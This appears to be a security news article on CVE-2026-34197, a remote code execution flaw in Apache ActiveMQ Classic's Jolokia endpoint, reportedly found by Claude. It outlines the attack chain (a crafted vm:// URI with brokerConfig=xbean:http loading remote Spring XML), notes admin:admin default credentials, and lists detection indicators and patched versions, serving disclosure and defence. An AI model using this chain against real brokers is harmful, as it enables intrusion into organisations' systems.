“`html
An essential remote code execution (RCE) vulnerability has been uncovered in Apache ActiveMQ Classic, a defect that remained unnoticed for more than a decade and was eventually identified not by a human analyst manually inspecting code, but by Anthropic’s Claude AI model in less than 10 minutes.
Categorized as CVE-2026-34197, this issue is an improper input validation and code injection vulnerability existing in Apache ActiveMQ Classic’s Jolokia JMX-HTTP bridge, exposed through the web console at /api/jolokia/ on port 8161.
This vulnerability enables an authenticated adversary to invoke the addNetworkConnector(String) management operation on the broker’s MBean and provide a crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter.
Upon processing, ActiveMQ’s VM transport layer generates an on-the-fly embedded broker by invoking BrokerFactory.createBroker() using the URL provided by the attacker.
Apache ActiveMQ RCE Vulnerability
The xbean: scheme subsequently delivers the URL to Spring’s ResourceXmlApplicationContext, which initializes all bean definitions in the remote XML file — permitting arbitrary OS command execution through Spring’s MethodInvokingFactoryBean to call Runtime.getRuntime().exec().
The root cause relates back to a fix for CVE-2022-41678, where Apache instituted a comprehensive Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to maintain the web console’s functionality. This decision inadvertently opened up every management operation — including addNetworkConnector — as an attack surface via Jolokia’s REST API.
While CVE-2026-34197 necessitates valid credentials in most implementations, default credentials (admin:admin) are frequently present across enterprise environments.
More alarmingly, entities employing ActiveMQ versions 6.0.0 to 6.1.1 are vulnerable to a fully unauthenticated RCE pathway. A separate defect, CVE-2024-32114, unintentionally removed authentication requirements from the /api/* path in those versions, meaning the Jolokia endpoint demands zero credentials — rendering CVE-2026-34197 a no-auth RCE on those builds.
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
Researchers at Horizon3.ai credited Anthropic’s Claude AI for pinpointing the defect during an AI-assisted source code review. By equipping Claude with a streamlined vulnerability-hunting prompt and a live target for verification, the team allowed the AI to track the multi-component attack chain encompassing Jolokia, JMX, network connectors, and VM transports in roughly 10 minutes.
Experts noted this sequence likely would have required a proficient human researcher an entire week to map manually, highlighting how AI models are fundamentally reducing the barrier for vulnerability research.
Organizations should keep an eye on ActiveMQ broker logs for entries mentioning vm:// URIs that contain brokerConfig=xbean:http, POST requests to /api/jolokia/ featuring addNetworkConnector in the body, and unpredictable outbound HTTP connections from the ActiveMQ process. Defenders should also monitor for unusual child processes spawned by the ActiveMQ JVM.
The vulnerability is resolved in ActiveMQ Classic versions 5.19.4 and 6.2.3. The correction eliminates the capability for addNetworkConnector to register vm:// transports through the Jolokia API entirely.
All organizations operating affected versions should upgrade without delay and examine deployments for default credential usage across all ActiveMQ instances.
“`